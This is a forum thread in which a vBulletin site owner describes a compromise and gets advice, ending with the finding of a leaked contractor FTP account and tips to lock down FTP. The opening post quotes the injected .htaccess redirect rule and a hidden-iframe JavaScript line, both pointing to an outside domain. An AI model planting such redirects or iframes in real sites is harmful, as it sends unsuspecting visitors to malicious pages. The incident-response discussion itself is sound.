Hey,

for a second time, our forum has been hacked. The following happens:

.htaccess is edited to redirect all queries to another URL
Javascript files are appended with iFrame code
New .htaccess files are created in all subfolders, redirecting all queries to another URL


The .htaccess file included this new line:
RewriteRule ^.*$ http://senior-fun-shooters.de/mccd.html?h=XXX [L,R]

iFame code looks like:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://senior-fun-shooters.de/mccd.html?j=XXX></iframe>');

Forum technical details:

vBulletin 4.2.0 Patch Level 3
vbSEO and vbSEO :: Sitemap Generator installed
GlowHost - Spam-O-Matic installed


This is the second time this has happened, so I suspect there's a known hack allowing these changes to be made. It could be a server permissions problem on our side too. Do you have any pointers for where this hack is already discussed?

Are you on dedicated or shared hosting? Sounds like the hosting environment is not secure...

It is on our virtual private server, so we do control the permissions (that's not to say that our permissions are all set correctly...)

Why don't you start with posting permissions for the directories and also the hosting environment's OS, current security modules installed etc

Permissions for the form folder itself, and its subfolders is `drwxr-xr-x`.

It's running on Cent OS Linux. As it's a managed server, I don't have specifics on current securty modules installed.

Is what I mentioned a known security hack?

You are still of the mind that this could be prevented by correct folder permissions, am I right?

Have you checked your server logs to find the IP of the person who did this? Then check your access_logs for that IP and see what they did on your site.

Do what Lynne said also. Access and server logs will tell you how and what happened. Most website vulnerabilities are due to the host not setting up a secure environment....

Thanks for all the advice.

Our Apache logs certainly show the time the 404 responses begun to spring up. However, there does not seem to be more access information than that. I could be wrong, of course, and we'll search the help of an expert in the area of Linux.

I can confirm that this hack took place through FTP access.

That means it was not a mal-configured server or vBulletin's fault.

How the strong FTP password was cracked is another question. It was an account created specfically for a past vBulletin contractor. Either the password was brute-force guessed (which I don't suspect), or the contractor's machine or FTP communication with our server was compromised.

Lock down FTP access to allow access from only known, trusted IP addresses through your firewall. You should be able to do that through your server control panel.

And actually on a running site that isn't being updated for any reason, there's no reason to allow any FTP access to the server at all.

Good tip, nhawk. We don't use FTP at all for our site updates, so we better lock it down.